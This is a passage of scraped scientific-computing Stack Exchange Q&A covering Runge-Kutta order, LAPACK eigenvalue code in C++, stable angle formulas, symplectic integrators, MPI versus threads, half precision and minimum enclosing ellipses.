Hairer dopri implementations (though one might be surprised that the DifferentialEquations.jl implementations are actually faster, which of course helps the Tsit5 implementation). I now recommend it as the default order 4/5 method. | {
"source": [
"https://scicomp.stackexchange.com/questions/24998",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/21712/"
]
} |
25,581 | I was just curious as to why high-order (i.e. greater than 4) Runge–Kutta methods are almost never discussed/employed (at least to my knowledge). I understand it requires greater computational time per step (e.g. RK14 with 12th-order embedded step ), but are there any other downsides of using higher order Runge–Kutta methods (e.g. stability issues)? When applied to equations with highly oscillating solutions on extreme time scales, wouldn't such higher-order methods be typically preferred? | There are thousands of papers and hundreds of codes out there using Runge-Kutta methods of fifth order or higher. Note that the most commonly used explicit integrator in MATLAB is ODE45, which advances the solution using a 5th-order Runge-Kutta method. Examples of widely-used high-order Runge-Kutta methods The paper of Dormand & Prince giving a 5th-order method has over 1700 citations according to Google Scholar . Most of those are papers using their method to solve some problem. The Cash-Karp method paper has over 400 citations . Perhaps the most widely-used method of order higher than 5 is the 8th-order method of Prince-Dormand which has over 400 citations on Google Scholar . I could give many other examples; and keep in mind that many (if not most) of the people using these methods never cite the papers. Note also that high-order extrapolation and deferred correction methods are Runge-Kutta methods . High-order methods and rounding error If your accuracy is limited by rounding errors then you should use a higher-order method . This is because higher-order methods require fewer steps (and fewer function evaluations, even though there are more evaluations per step), so they commit fewer rounding errors. You can easily verify this yourself with simple experiments; it is a good homework problem for a first course in numerical analysis. Tenth-order methods are extremely useful in double-precision arithmetic. On the contrary, if all we had was Euler's method, then rounding error would be a major issue and we would need very high-precision floating point numbers for many problems where high-order solvers do just fine. High order methods can be just as stable @RichardZhang has referenced the second Dahlquist barrier, but that applies only to multistep methods. The question posted here is about Runge-Kutta methods, and there are Runge-Kutta methods of every order that are not only $A$ -stable, but also $B$ -stable (a stability property useful for some nonlinear problems). To learn about these methods, see for instance the text of Hairer & Wanner. High-order methods in celestial mechanics You ask When applied to equations with highly oscillating solutions on extreme time scales, wouldn't such higher-order methods be typically preferred? You're exactly right! A prime example of this is celestial mechanics. I'm not an expert in that area. But this paper , for instance, compares methods for celestial mechanics and doesn't even consider order lower than 5. It concludes that methods of order 11 or 12 are often the most efficient (with the Prince-Dormand method of order 8 also often very efficient). | {
"source": [
"https://scicomp.stackexchange.com/questions/25581",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/20407/"
]
} |
26,161 | I'm a double major in computer science and mathematics. I love both subjects. I'm thinking in taking a graduate career, perhaps in scientific computing. What's the real difference between scientific computing and numerical analysis? Are they studied as careers? | Wikipedia gives a good definition Numerical analysis is the study of algorithms that use numerical
approximation (as opposed to general symbolic manipulations) for the
problems of mathematical analysis (as distinguished from discrete
mathematics). Numerical analysts are typically interested in proving mathematical results about their algorithms, including error bounds (how large can the error in the approximation be), convergence of iterative schemes (does the approximation approach the correct limit), order and rate of convergence (how fast does the algorithm converge), and computational complexity (bounding the number of operations required by an algorithm.) It's possible to do research in these areas without ever using a computer, and some important results even predate the development of digital computers in the 1950's. Wikipedia also has a definition for "Scientific Computing" Computational science (also scientific computing or scientific
computation (SC)) is a rapidly growing multidisciplinary field that
uses advanced computing capabilities to understand and solve complex
problems. Computational science fuses three distinct elements:[1]
Algorithms (numerical and non-numerical) and modeling and simulation
software developed to solve science (e.g., biological, physical, and
social), engineering, and humanities problems Computer and information
science that develops and optimizes the advanced system hardware,
software, networking, and data management components needed to solve
computationally demanding problems The computing infrastructure that
supports both the science and engineering problem solving and the
developmental computer and information science. Scientific computing is much more about practical aspects of getting accurate solutions out of computers. This obviously builds on the results of numerical analysis, but it also draws heavily on computer architecture and software engineering. Although research in scientific computing is often done for its own sake and to develop hardware and software that will be of use in many applications, there is also a lot of scientific computing research that is driven by the need to solve particular science and engineering problems. For example, the development of global climate models to study climate change has also moved scientific computing forward. Numerical analysis is most commonly found in mathematics and applied mathematics departments, while scientific computing is an interdisciplinary field that can be found in computer science departments, mathematics departments, and in the various engineering and science disciplines. | {
"source": [
"https://scicomp.stackexchange.com/questions/26161",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/23250/"
]
} |
26,258 | Right now I stuck with a problem. It seems to be really trivial one, but still it is hard for me to find an appropriate solution. The problem is:
One has two intervals and are to find the intersection of them. For instance: Intersection of [0, 3]&[2, 4] is [2, 3] Intersection of [-1, 34]&[0, 4] is [0, 4] Intersection of [0, 3]&[4, 4] is empty set It is pretty clear that the problem can be solved by using tests of all possible cases, but it will take a lot of time and is very prone to mistakes. Are there any easier way to tackle the problem? If you know the solution help me, please. Will be very grateful. | We can define a solution to this problem in the following way. Assume the input intervals can be defined as $I_{a} = [a_s, a_e]$ and $I_{b} = [b_s, b_e]$, while the output interval is defined as $I_{o} = [o_s, o_e]$. We can find the intersection $I_{o} = I_{a} \bigcap I_{b}$ doing the following: if ( $b_s \gt a_e$ or $a_s \gt b_e$ ) { return $\emptyset$ } else { $o_s = \max (a_s,b_s)$ $o_e = \min (a_e,b_e)$ return $[o_s,o_e]$ } | {
"source": [
"https://scicomp.stackexchange.com/questions/26258",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/23387/"
]
} |
26,395 | I'm new to computational science and I already have learned basic methods for integration, interpolation, methods like RK4, Numerov etc on c++ but recently my professor asked me to learn how to use LAPACK for solving problems related to matrices. Like for example finding eigenvalues of a complex matrix. I have never used third-party libraries and I almost always write my own functions. I have been searching around for several days but can't find any amateur-friendly guide to lapack. All of them are written in words I don't understand and I don't know why using already written functions should be this complicated. They are full of words like zgeev, dtrsv, etc. and I'm frustrated. I just want to code something like this pseudo-code: #include <lapack:matrix>
int main(){
LapackComplexMatrix A(n,n);
for...
for...
cin>>A(i,j);
cout<<LapackEigenValues(A);
return 0;
} I don't know if I'm being silly or amateur. But again, this shouldn't be that hard should it?
I don't even know should I use LAPACK or LAPACK++. (I write codes in c++ and have no knowledge of Python or FORTRAN) and how to install them. | I'm going to disagree with some of the other answers and say that I believe that figuring out how to use LAPACK is important in the field of scientific computing. However, there is a large learning curve to using LAPACK. This is because it is written at a very low level. The disadvantage of that is that it seems very cryptic, and not pleasant to the senses. The advantage of it is that the interface is unambiguous and basically never changes. Additionally, implementations of LAPACK, such as the Intel Math Kernel Library are really fast. For my own purposes, I have my own higher level C++ classes which wrap around LAPACK subroutines. Many scientific libraries also use LAPACK underneath. Sometimes it's easier to just use them, but in my opinion there's a lot of value in understanding the tool underneath. To that end, I've provided a small working example written in C++ using LAPACK to get you started. This works in Ubuntu, with the liblapack3 package installed, and other necessary packages for building. It can probably be used in most Linux distributions, but installation of LAPACK and linking against it can vary. Here's the file test_lapack.cpp #include <iostream>
#include <fstream>
using namespace std;
// dgeev_ is a symbol in the LAPACK library files
extern "C" {
extern int dgeev_(char*,char*,int*,double*,int*,double*, double*, double*, int*, double*, int*, double*, int*, int*);
}
int main(int argc, char** argv){
// check for an argument
if (argc<2){
cout << "Usage: " << argv[0] << " " << " filename" << endl;
return -1;
}
int n,m;
double *data;
// read in a text file that contains a real matrix stored in column major format
// but read it into row major format
ifstream fin(argv[1]);
if (!fin.is_open()){
cout << "Failed to open " << argv[1] << endl;
return -1;
}
fin >> n >> m; // n is the number of rows, m the number of columns
data = new double[n*m];
for (int i=0;i<n;i++){
for (int j=0;j<m;j++){
fin >> data[j*n+i];
}
}
if (fin.fail() || fin.eof()){
cout << "Error while reading " << argv[1] << endl;
return -1;
}
fin.close();
// check that matrix is square
if (n != m){
cout << "Matrix is not square" <<endl;
return -1;
}
// allocate data
char Nchar='N';
double *eigReal=new double[n];
double *eigImag=new double[n];
double *vl,*vr;
int one=1;
int lwork=6*n;
double *work=new double[lwork];
int info;
// calculate eigenvalues using the DGEEV subroutine
dgeev_(&Nchar,&Nchar,&n,data,&n,eigReal,eigImag,
vl,&one,vr,&one,
work,&lwork,&info);
// check for errors
if (info!=0){
cout << "Error: dgeev returned error code " << info << endl;
return -1;
}
// output eigenvalues to stdout
cout << "--- Eigenvalues ---" << endl;
for (int i=0;i<n;i++){
cout << "( " << eigReal[i] << " , " << eigImag[i] << " )\n";
}
cout << endl;
// deallocate
delete [] data;
delete [] eigReal;
delete [] eigImag;
delete [] work;
return 0;
} This can be built using the command line g++ -o test_lapack test_lapack.cpp -llapack This will produce an executable named test_lapack . I've set this up to read in a text input file. Here's a file named matrix.txt containing a 3x3 matrix. 3 3
-1.0 -8.0 0.0
-1.0 1.0 -5.0
3.0 0.0 2.0 To run the program simply type ./test_lapack matrix.txt at the command line, and the output should be --- Eigenvalues ---
( 6.15484 , 0 )
( -2.07742 , 3.50095 )
( -2.07742 , -3.50095 ) Comments: You seem thrown off by the naming scheme for LAPACK. A short description is here . The interface for the DGEEV subroutine is here . You should be able to compare the description of the arguments there to what I've done here. Note the extern "C" section at the top, and that I've added an underscore to dgeev_ . That's because the library was written and built in Fortran, so this is necessary to make the symbols match when linking. This is compiler and system dependent, so if you use this on Windows, it will all have to change. Some people might suggest using the C interface to LAPACK . They might be right, but I've always done it this way. | {
"source": [
"https://scicomp.stackexchange.com/questions/26395",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/23599/"
]
} |
27,689 | When applying the classical formula for the angle between two vectors: $$\alpha = \arccos \frac{\mathbf{v_1} \cdot \mathbf{v_2}}{\|\mathbf{v_1}\| \|\mathbf{v_2}\|}$$ one finds that, for very small/acute angles, there is a loss of precision and the result is not accurate. As explained in this Stack Overflow answer , one solution is to use the arctangent instead: $$\alpha = \arctan2 \left(\|\mathbf{v_1} \times \mathbf{v_2}\|, \mathbf{v_1} \cdot \mathbf{v_2} \right) $$ And this indeed gives better results. However, I wonder if this would give bad results for angles very close to $\pi / 2$. Is it the case? If so, is there any formula to accurately compute angles without checking for a tolerance inside an if branch? | ( I have tested this approach before, and I remember it worked correctly, but I haven't tested it specifically for this question. ) As far as I can tell, both $\|\mathbf{v}_1\times \mathbf{v}_2\|$ and $\mathbf{v}_1\cdot \mathbf{v}_2$ can suffer from catastrophic cancellation if they are almost parallel/perpendicular—atan2 can't give you good accuracy if either input is off. Start by reformulating the problem as finding the angle of a triangle with side lengths $a=|\mathbf{v}_1|$, $b=|\mathbf{v}_2|$ and $c=|\mathbf{v}_1-\mathbf{v}_2|$ (these are all accurately computed in floating point arithmetic). There is a well-known variant of Heron's formula due to Kahan ( Miscalculating Area and Angles of a Needle-like Triangle ), which allows you to compute the area and angle (between $a$ and $b$) of a triangle specified by its side lengths, and do so numerically stably. Because the reduction to this subproblem is accurate as well, this approach should work for arbitrary inputs. Quoting from that paper (see p.3), assuming $a\geq b$,
$$ \mu = \begin{cases}
c-(a-b),&\text{if }b\geq c\geq 0,\\
b-(a-c),&\text{if }c>b\geq 0,\\
\text{invalid triangle},&\text{otherwise}
\end{cases}$$
$$
\mathrm{angle} = 2\arctan\left(
\sqrt{\frac{((a-b)+c)\mu}{(a+(b+c))((a-c)+b)}}
\right)$$
All the parentheses here are placed carefully, and they matter; if you find yourself taking the square root of a negative number, the input side lengths are not the side lengths of a triangle. There is an explanation of how this works, including examples of values for which other formulas fail, in Kahan's paper. Your first formula for $\alpha$ is $C''$ on page 4. The main reason I suggest Kahan's Heron's formula is because it makes a very nice primitive—lots of potentially tricky planar geometry questions can be reduced to finding the area/angle of an arbitrary triangle, so if you can reduce your problem to that, there is a nice stable formula for it, and there's no need to come up with something on your own. Edit Following Stefano's comment, I made a plot of relative error for $v_1=(1,0)$, $v_2=(\cos\theta, \sin\theta)$ ( code ). The two lines are the relative errors for $\theta=\epsilon$ and $\theta=\pi/2-\epsilon$, $\epsilon$ going along the horizontal axis. It seems that it works. | {
"source": [
"https://scicomp.stackexchange.com/questions/27689",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/782/"
]
} |
29,149 | In this comment I wrote: ...default SciPy integrator, which I'm assuming only uses symplectic methods. in which I am refering to SciPy's odeint , which uses either a "non-stiff (Adams) method" or a "stiff (BDF) method". According to the source : def odeint(func, y0, t, args=(), Dfun=None, col_deriv=0, full_output=0,
ml=None, mu=None, rtol=None, atol=None, tcrit=None, h0=0.0,
hmax=0.0, hmin=0.0, ixpr=0, mxstep=0, mxhnil=0, mxordn=12,
mxords=5, printmessg=0):
"""
Integrate a system of ordinary differential equations.
Solve a system of ordinary differential equations using lsoda from the
FORTRAN library odepack.
Solves the initial value problem for stiff or non-stiff systems
of first order ode-s::
dy/dt = func(y, t0, ...)
where y can be a vector.
""" Here is an example where I propagate a satellite's orbit around the earth for three months just to show that it precesses as expected. I believe that non-symplectic integrators have the undesirable property that they will tend not to conserve energy (or other quantities) and so are undesirable in orbital mechanics for example. But I'm not exactly sure what it is that makes a symplectic integrator symplectic. Is it possible to explain what the property is (that makes a symplectic integrator symplectic) in a straightforward and (fairly) easy to understand but not inaccurate way? I'm asking from the point of view of how the integrator functions internally , rather than how it performs in testing. And is my suspicion correct that odeint does use only symplectic integrators? | Let me start off with corrections. No, odeint doesn't have any symplectic integrators. No, symplectic integration doesn't mean conservation of energy. What does symplectic mean and when should you use it? First of all, what does symplectic mean? Symplectic means that the solution exists on a symplectic manifold. A symplectic manifold is a solution set which is defined by a 2-form. The details of symplectic manifolds probably sound like mathematical nonsense, so instead the gist of it is there is a direct relation between two sets of variables on such a manifold. The reason why this is important for physics is because Hamiltonian's equations naturally have that the solutions reside on a symplectic manifold in phase space, with the natural splitting being the position and momentum components. For the true Hamiltonian solution, that phase space path is constant energy. A symplectic integrator is an integrator whose solution resides on a symplectic manifold. Because of discretization error, when it is solving a Hamiltonian system it doesn't get exactly the correct trajectory on the manifold. Instead, that trajectory itself is perturbed $\mathcal{O}(\Delta t^n)$ for the order $n$ from the true trajectory. Then there's a linear drift due to numerical error of this trajectory over time. Normal integrators tend to have a quadratic (or more) drift, and do not have any good global guarantees about this phase space path (just local). What this tends to mean is that symplectic integrators tend to capture the long-time patterns better than normal integrators because of this lack of drift and this almost guarantee of periodicity. This notebook displays those properties well on the Kepler problem . The first image shows what I'm talking about with the periodic nature of the solution. This was solved using the 6th order symplectic integrator from Kahan and Li from DifferentialEquations.jl . You can see that the energy isn't exactly conserved, but its variation is dependent on how far the perturbed solution manifold is from the true manifold. But since the numerical solution itself resides on a symplectic manifold, it tends to be almost exactly periodic (with some linear numerical drift that you can see), making it do very nicely for long term integration. If you do the same with RK4, you can get disaster: You can see that the issue is that there's no true periodicity in the numerical solution and therefore overtime it tends to drift. This highlights the true reason to choose symplectic integrators: symplectic integrators are good on long-time integrations on problems that have the symplectic property (Hamiltonian systems) . So let's walk through a few things. Note that you don't always need symplectic integrators even on a symplectic problem. For this case, an adaptive 5th order Runge-Kutta method can do fine. Here's Tsit5 : Notice two things. One, it gets a good enough accuracy that you cannot see the actual drift in the phase space plot. However, on the right side you can see that there is this energy drift, and so if you are doing a long enough integration this method will not do as well as the solution method with the periodic properties. But that raises the question, how does it fare efficiency-wise vs just integrating extremely accurately? Well, this is a bit less certain. In SciMLBenchmarks.jl you can find some benchmarks investigating this question. For example, this notebook looks at the energy error vs runtime on a Hamiltonian equation system from a quadruple Boson model and shows that if you want really high accuracy, then even for quite long integration times it's more efficient to just use a high order RK or Runge-Kutta Nystrom (RKN) method. This makes sense because to satisfy the symplectic property the integrators give up some efficiency and pretty much have to be fixed time step (there is some research making headway into the latter but it's not very far along). In addition, notice from both of these notebooks that you can also just take a standard method and project it back to the solution manifold each step (or every few steps). This is what the examples using the DifferentialEquations.jl ManifoldProjection callback are doing. You see that guarantees conservation laws are upheld but with an added cost of solving an implicit system each step. You can also use a fully-implicit ODE solver or singular mass matrices to add on conservation equations, but the end result is that these methods are more computationally-costly as a tradeoff. So to summarize, the class of problems where you want to reach for a symplectic integrator are those that have a solution on a symplectic manifold (Hamiltonian systems) where you don't want to invest the computational resources to have a very exact (tolerance <1e-12 ) solution and don't need exact energy/etc. conservation. This highlights that it's all about long-term integration properties, so you shouldn't just flock to them all willy-nilly like some of the literature suggests. But they are still a very important tool in many fields like Astrophysics where you do have long time integrations that you need to solve sufficiently fast without having absurd accuracy. Where do I find symplectic integrators? What kind of symplectic integrators exist? There are generally two classes of symplectic integrators. There are the symplectic Runge-Kutta integrators (which are the ones shown in the above examples) and there are implicit Runge-Kutta methods which have the symplectic property. As @origimbo mentions, the symplectic Runge-Kutta integrators require that you provide them with a partitioned structure so they can handle the position and momentum parts separately. However, counter to the comment, the implicit Runge-Kutta methods are symplectic without requiring this, but instead require solving a nonlinear system. This isn't too bad because if the system is non-stiff this nonlinear system can be solved with functional iteration or Anderson acceleration, but the symplectic RK methods should still probably be preferred for efficiency (it's a general rule that the more information you provide to an integrator, the more efficient it is). That said, odeint does not have methods from either of these families , so it is not a good choice if you're looking for symplectic integrators. In Fortran, Hairer's site has a small set you can use . Mathematica has a few built in . The GSL ODE solvers have implicit RK Gaussian point integrators which IIRC are symplectic, but that's about the only reason to use the GSL methods. But the most comprehensive set of symplectic integrators can be found in DifferentialEquations.jl in Julia (recall this was used for the notebooks above). The list of available symplectic Runge-Kutta methods is found on this page and you'll notice that the implicit midpoint method is also symplectic (the implicit Runge-Kutta Trapezoid method is considered "almost symplectic" because it's reversible). Not only does it have the largest set of methods, but it's also open-source (you can see the code and its tests in a high-level language) and has a lot of benchmarks . A good introductory notebook for using it to solve physical problems is this tutorial notebook . But of course it's recommended you get started with the package through the first ODE tutorial . In general you can find a detailed analysis of numerical differential equation suites at this blog post . It's quite detailed but since it has to cover a lot of topics it does each at less detail than this, so feel free to ask for it to be expanded in any way. | {
"source": [
"https://scicomp.stackexchange.com/questions/29149",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/17869/"
]
} |
33,076 | I am at an international conference (ICIAM2019) about numerical methods and am surprised by the prevalence of applications directly relatable to arms research. examples: One award winner holds his talk about the mathematical problem of radar reconstruction/detection of moving objects, within his talk he describes the situation of a radar "platform" in 8km height using active radar detecting "moving subjects" at ground level, and he goes on about how magnificently tricky this problem is. people are presenting methods to accurately resolve and simulate shockwaves, and a quick google search reveals that they are working on "inertial confinement fusion". at after-conference dinner I sat next to people doing numerics in Los Alamos. I am doing my phd in applied math and numerical methods, and to be honest, I did not anticipate that the people receiving awards and are put on the large stages are doing arms research. I also noticed that the audience, which is presumably smarter than me, is applauding this work. I am wondering whether or not I would want to be part of this community, and if it is possible to build a career in applied math without directly or indirectly contributing to arms research. Is this something that is shrugged of? I am at a very early stage and would be very grateful for advice from the more experienced folks. | I completely agree with @Anton in his discussion. No matter what scientific computing work you do, if you publish it in some public journal or location, it can be used to build weapons or further military tech. I worked on missiles for a few years in a classified lab and I can tell you that I used my scientific computing background constantly in that environment. Using what I knew about solving differential equations or doing optimization and distributed computing were only a subset of the things I benefited from in that line of work and that doesn’t include other areas such as AI, computer science, controls, dynamical systems, etc. I can also tell you it was the norm in our lab to find papers and/or blog posts in these topics, when needed, to try and advance different algorithms for our purposes. So indirectly, anything you make public and available could be used. So you’ll never escape that. That said, I think it’s totally reasonable to never need to directly support arms research with your work. Some of my current colleagues have had big careers in scientific computing and they haven’t supported any arms research directly. | {
"source": [
"https://scicomp.stackexchange.com/questions/33076",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/28636/"
]
} |
34,213 | $A$ and $B$ are $n \times n$ matrices and $v$ is a vector with $n$ elements. $Av$ has $\approx 2n^2$ flops and $A+B$ has $n^2$ flops. Following this logic, $(A+B)v$ should be faster than $Av+Bv$ . Yet, when I run the following code in matlab A = rand(2000,2000);
B = rand(2000,2000);
v = rand(2000,1);
tic
D=zeros(size(A));
D = A;
for i =1:100
D = A + B;
(D)*v;
end
toc
tic
for i =1:100
(A*v+B*v);
end
toc The opposite is true. A v+B v is over twice as fast. Any explanations? | Except for code which does a significant number of floating-point operations on data that are held in cache, most floating-point intensive code is performance limited by memory bandwidth and cache capacity rather than by flops. $v$ and the products $Av$ and $Bv$ are all vectors of length 2000 (16K bytes in double precision), which will easily fit into a level 1 cache. The matrices $A$ and $B$ are 2000 by 2000 or about 32 megabytes in size. Your level 3 cache might be large enough to store one of these matrices if you've got a really good processor. Computing $Av$ requires reading 32 megabytes (for $A$ ) in from memory, reading in 16K bytes (for $v$ ) storing intermediate results in the L1 cache and eventually writing 16K bytes out to memory. Multiplying $Bv$ takes the same amount of work. Adding the two intermediate results to get the final result requires a trivial amount of work. That's a total of roughly 64 megabytes of reads and an insignificant number of writes. Computing $(A+B)$ requires reading 32 megabytes (for A) plus 32 megabytes (for B) from memory and writing 32 megabytes (for A+B) out. Then you have to do a single matrix-vector multiplication as above which involves reading 32 megabytes from memory (if you've got a big L3 cache, then perhaps this 32 megabytes is in that L3 cache.) That's a total of 96 megabytes of reads and 32 megabytes of writes. Thus there's twice as much memory traffic involved in computing this as $(A+B)v$ instead of $Av+Bv$ . Note that if you have to do many of these multiplications with different vectors $v$ but the same $A$ and $B$ , then it will become more efficient to compute $A+B$ once and reuse that matrix for the matrix-vector multiplications. | {
"source": [
"https://scicomp.stackexchange.com/questions/34213",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/26743/"
]
} |
34,915 | MPI is an interface which enables us to create multiple processes to be run on a single machine or on a cluster of machines, and enables message passing or in short sorts of communication between processes. I am sure they are other lots of specifications which enables multi processing to execute one bigger task. However, multi tasking and breaking a bigger task into smaller can also be done via threads. As far as I understand creating threads is much faster compared to processes and it does not need any message passing to communicate as shared memory is inherent. Why do you even need specifications like MPI and others for multi processing when you can achieve same effect using multi threaded programs ? | There is one real and one practical reason. First, MPI was developed at a time when machines had exactly one processor core and when we wanted to couple different machines. It is today used on clusters of tens of thousands of machines, each of which happens to have many cores but the point is that it's still separate machines. Now, a processor core on machine A can't access memory on machine B, and so there needs to be a way to transfer information between these processes -- that's what the message passing interface (MPI) fundamentally does: transfer data from one machine to another. You are entirely correct that, strictly speaking, you don't need MPI if you are working on one machine only. That of course limits how far you can scale your program (you will be able to use a few dozen threads, but not thousands since we don't have machines with that many cores). But more importantly, when you use threads, you now have a few dozen threads all accessing the same memory. It turns out to be conceptually very difficult to write codes that are efficient because historically we have been taught that the way to access shared data structures is to just use a mutex to access the information. That turns out to be efficient if you have 4 cores access the same memory, but not if you have 192: In that case, the ratio of time spent on computing information to time spent obtaining the mutex is just not very good any more. What one needs to do to address the issue is that every thread duplicates the read-write data structures during the main phase of the algorithm (so that they can be accessed without a mutex), followed by a reduction step. In other words, threads need to keep separate copies of data structures for efficiency. But that's not how we think when we program with threads, and so few implementations employ this strategy. On the other hand, that's what you need to do when you program with MPI because every process has its own memory space -- so MPI forces you to do what you should do with threads, and that's why using MPI often leads to quite efficient and scalable programs even when used in situations where threads could be used. | {
"source": [
"https://scicomp.stackexchange.com/questions/34915",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/35721/"
]
} |
35,187 | I am new to computer science and I was wondering whether half precision is supported by modern architecture in the same way as single or double precision is. I thought the 2008 revision of IEEE-754 standard introduced both quadruple and half precisions. | Intel support for IEEE float16 storage format Intel supports IEEE half as a storage type in processors since Ivy Bridge (2013). Storage type means you can get a memory/cache capacity/bandwidth advantage but the compute is done with single precision after converting to and from the IEEE half precision format. https://software.intel.com/content/www/us/en/develop/blogs/intel-half-precision-floating-point-format-conversion-instructions.html https://software.intel.com/content/www/us/en/develop/articles/performance-benefits-of-half-precision-floats.html Intel support for BFloat16 Intel has announced support for BF16 in Cooper Lake and Sapphire Rapids. https://software.intel.com/sites/default/files/managed/40/8b/bf16-hardware-numerics-definition-white-paper.pdf https://software.intel.com/sites/default/files/managed/c5/15/architecture-instruction-set-extensions-programming-reference.pdf https://software.intel.com/content/dam/develop/public/us/en/documents/architecture-instruction-set-extensions-programming-reference.pdf (the June 2020 update 319433-040 describes AMX BF16) I work for Intel. I’m citing official sources and will not comment on rumors etc. It is good to be curious about the relative merits of IEEE FP16 vs BF16. There is a lot of analysis of this topic, e.g. https://nhigham.com/2018/12/03/half-precision-arithmetic-fp16-versus-bfloat16/ . Non-Intel Hardware Support The following is information on other processors. Please verify with the vendors as necessary. http://on-demand.gputechconf.com/gtc/2017/presentation/s7676-piotr-luszcek-half-precision-bencharking-for-hpc.pdf lists the following hardware support: AMD - MI5, MI8, MI25 ARM - NEON VFP FP16 in V8.2-A NVIDIA - Pascal and Volta NVIDIA Ampere has FP16 support as well ( https://devblogs.nvidia.com/nvidia-ampere-architecture-in-depth/ ). | {
"source": [
"https://scicomp.stackexchange.com/questions/35187",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/36031/"
]
} |
38,873 | I came across this line in a class note I am reading where it discusses finding eigenvalues of matrices. In reality we don't go all the way with Arnoldi. We stop at a decent value of . Then the eigenvalues of are (usually) good approximations to extreme eigenvalues of . Trefethen and Bau emphasize for non-symmetric that we may not want eigenvalues of in the first place! When they are badly conditioned, this led Trefethen and Embree to the theory of pseudospectra. Why is this the case? I understand that for symmetric matrices, there are many nice properties of eigenvalues. For example the eigenvalues of a real symmetric matrix are real. SVD comes from the eigenvalues of $A^TA$ which is symmetric, etc. But why are we so confident that we usually don't need to find the eigenvalues of non-symmetric matrix? Is it purely because of the nice properties of symmetric matrix that make us tend to formulate our problems that way? If someone can explain or point to where Trefethen and Bau explains it, that would be great. I have that book, but I can't find the explanation based in the relevant chapters I went through. | Stability under perturbations Let $E$ be a perturbation such that $\|E\| \leq \varepsilon$ . If $A$ is symmetric, then the eigenvalues of $A+E$ are at a distance $\varepsilon$ from those of $A$ . ( Bauer-Fike Theorem .) If $A$ is non-symmetric, then the eigenvalues of $A+E$ can be much further away. Example: start with a Jordan block of size $n$ , and perturb the $(1,n)$ entry to $\varepsilon$ ; then the eigenvalues are the $k$ th complex roots of $\varepsilon$ , which have magnitude $\varepsilon^{1/n}$ . If $\varepsilon=10^{-16}$ and $n=16$ , an incredibly tiny perturbation changed the eigenvalues by $0.1$ . Instead, if $A$ is non-symmetric, then the $\delta$ -pseudospectrum of $A+E$ is at a distance $\varepsilon$ from that of $A$ (follows from the definition). So, the point is, how sure are you that the numbers in your matrix $A$ are correct? What if that measurement is only accurate to the third decimal digit? What about that tiny $2^{-52}$ error that you make when you truncate the coefficient 2/3 to a double? Those small perturbations affect your computed eigenvalues. There is little point in computing a number if you don't know how accurate it is in the first place. Or, worse, if you know from the start that it is inaccurate. Pseudospectra capture nicely this concept that the true location of the eigenvalues is uncertain, for non-symmetric matrices, and provide a concept analogous to eigenvalues that is stable under perturbations. | {
"source": [
"https://scicomp.stackexchange.com/questions/38873",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/1418/"
]
} |
38,932 | I've always had this question in mind (even if it may sound vague), but in my numerical analysis courses we've always learned how to analyze and optimize code. However, since most linear algebra libraries (i.e. LAPACK, BLAS, etc.) have been continuously optimized by professional developers since the 1980s, I'm questioning what the purpose of having us write down algorithms and run them is. For example, we've had to write the QR iteration algorithm in MATLAB when there's already a built-in function ( eig ). Are there special cases where these built-in functions are vunerable for numerical instability where custom algorithms would outperform them? Update : I want to thank you all for your interesting answers and comments I have read them all. I also realized the beauty of this very narrow field of mathematics that has profound application in our work. The amount of effort that these mathematicians and computer scientist have invested in making these codes more powerful have made it beautiful for us (the ones who are learning about their theories) so that we can admire them while studying and knowing when to use these optimized built-in functions. While we write down a 15 line of codes to compute the Householder QR decomposition of some matrix $A$ , I can only wonder how many lines of codes the built in function qr() has (probably in the 100s) so that it can serve us best in our computations in real life applications. | Although LAPACK has some incredibly optimized code, it can still be worth it to write your own version in a few cases. The most important reason (and the reason they make you do it in your course). It's a great learning experience. You will never fully understand something like the QR algorithm (which is actually incredibly complicated to get the details right) unless you spend some time implementing it. A lot of the skills you pick up will translate when you write other numerical codes. A lot of the code is contributed by the researchers who develop the algorithms and it takes a lot of effort. Researchers are usually evaluated on how many papers they publish, not the code they write for libraries, so there can be a lack of incentive for researchers to contribute these codes. As an example, it was only last year that an optimized version of the QZ algorithm was contributed, although a paper was published on it in 2006. LAPACK code needs to be robust and general. This is mostly important for the small scale routines. I'll talk about DLARTG as an example. That routine calculates a Givens rotation. It has a lot of scaling, safety checks and exceptions to make sure it is always accurate for all the input you could ever give it. If you know that for your application, these safety checks will not be necessary or you don't need the strong accuracy guarantees, you can achieve faster results. | {
"source": [
"https://scicomp.stackexchange.com/questions/38932",
"https://scicomp.stackexchange.com",
"https://scicomp.stackexchange.com/users/40046/"
]
} |
40,494 | I have a set of points that resembles more of an ellipse than a circle. I implemented the optimization formulation below and the solution gives a circle. I tried with various initial values, still to no avail. Have I overlooked or mistaken something? $$ \begin{align}
\min_{r_{maj},r_{min}} \quad & \pi r_{maj}r_{min} \\
s.t. \quad & \left(\frac{x_i-x_c}{r_{maj}}\right)^2 + \left(\frac{y_i-y_c}{r_{min}}\right)^2 \leq 1 \quad \forall\;i
\end{align} $$ $r_{maj},r_{min}$ : major and minor radius $(x_c,y_c)$ : ellipse centre the red cross is the 'ellipse' centre obtained from the optimization result. | Theory The 1997 paper " Smallest Enclosing Ellipses -- Fast and Exact " by Gärtner and Schönherr addresses this question. The same authors provide a C++ implementation in their 1998 paper " Smallest Enclosing Ellipses -- An Exact and Generic Implementation in C++ ". The paper's 150 pages long, but, fortunately for us, the venerable CGAL library implements the algorithm as described here . However, CGAL only provides the general equation for the ellipse, so some massaging is necessary to convert the general equation to the canonical equation and, from there, to get a parametric equation suitable for plotting. All this is included in the implementation below. Using WebPlotDigitizer to extract your data gives: -2.024226110363392 5.01315585320002
1.9892328398384915 3.0400196291391692
-0.0269179004037694 1.980973446537659
-0.987886944818305 -0.9505049812548929
4.9851951547779265 -1.9398893695943187 Fitting this using the program below gives: a = 2.47438
b = 5.42919
cx = 0.767976
cy = 0.792924
